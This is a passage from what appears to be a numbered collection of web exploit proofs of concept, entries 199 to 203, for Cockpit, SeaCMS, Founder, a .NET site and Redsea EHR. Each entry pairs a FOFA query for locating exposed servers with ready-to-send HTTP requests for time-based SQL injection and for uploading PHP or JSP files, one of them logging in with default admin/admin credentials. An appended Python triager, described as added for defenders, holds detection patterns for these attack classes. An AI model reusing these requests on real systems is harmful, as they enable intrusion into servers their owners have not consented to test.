Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload endpoint file upload

1. Run the PoC to obtain the CSRF token, then obtain a cookie, then upload and request the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, containing csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to obtain a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) omnimedia news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
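An added example for defenders triaging captured traffic, not part of the original post: it flags the indicator classes that recur in entries 187 to 203 above (time-based and UNION SQL injection, local file reads, shell and os.system injection, executable uploads with traversal filenames, and the /js/../ and ;.js path tricks). The labels, helper names and sample requests are constructed for this illustration.

```python
"""Request triager for the indicator classes seen in entries 187-203.
Added example; labels, helpers and samples are constructed, not real traffic."""
import re
from urllib.parse import unquote_plus

# label -> regex applied to the URL-decoded request text (headers + body)
RULES = {
    "time_based_sqli": re.compile(r"waitfor\s+delay|\bsleep\s*\(|randomblob\s*\(", re.I),
    "union_sqli": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "local_file_read": re.compile(r"file://|/etc/passwd", re.I),
    "command_injection": re.compile(r"os\.system\s*\(|`[^`\n]+`|;\s*(?:uname|whoami|id)\b", re.I),
    "executable_upload": re.compile(r'filename="[^"\n]*\.(?:jspx?|php\d?|ashx|aspx?)"', re.I),
    "traversal_filename": re.compile(r'filename="[^"\n]*\.\./'),
}

def request_path(raw: str) -> str:
    """Decoded path (query string removed) taken from the request line."""
    parts = raw.lstrip().split("\n", 1)[0].split()
    if len(parts) < 2:
        return ""
    return unquote_plus(parts[1]).split("?", 1)[0]

def classify_request(raw: str) -> list[str]:
    """Sorted indicator labels matched by one raw HTTP request; [] if clean."""
    decoded = unquote_plus(raw)  # %27, %20 and '+' encoded payloads become readable
    hits = {label for label, rx in RULES.items() if rx.search(decoded)}
    path = request_path(raw)
    # "/js/../Servlet": a dot-dot segment used to reach a filtered endpoint
    if ".." in path.split("/"):
        hits.add("traversal_path")
    # "Action.entweb;.js": static-suffix path parameter that dodges auth filters
    if re.search(r";\.(?:js|css|png|jpe?g|gif)$", path, re.I):
        hits.add("suffix_bypass")
    return sorted(hits)

# Constructed samples mirroring the request shapes above
SAMPLES = {
    "sqli_delay": "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27--"
                  " HTTP/1.1\r\nHost: example.invalid\r\n\r\n",
    "upload": "POST /servlet/uploadAttachmentServlet HTTP/1.1\r\nHost: example.invalid\r\n"
              "Content-Type: multipart/form-data; boundary=X\r\n\r\n--X\r\n"
              'Content-Disposition: form-data; name="uploadFile"; filename="../../../web/app.war/hello.jsp"\r\n\r\n'
              '<% out.println("hello"); %>\r\n--X--\r\n',
    "benign": "GET /index.html HTTP/1.1\r\nHost: example.invalid\r\n\r\n",
}

def triage(samples: dict[str, str] = SAMPLES) -> dict[str, list[str]]:
    """Classify every sample; only samples with at least one hit are returned."""
    return {name: hits for name, raw in samples.items() if (hits := classify_request(raw))}

if __name__ == "__main__":
    for name, labels in triage().items():
        print(f"{name}: {', '.join(labels)}")
```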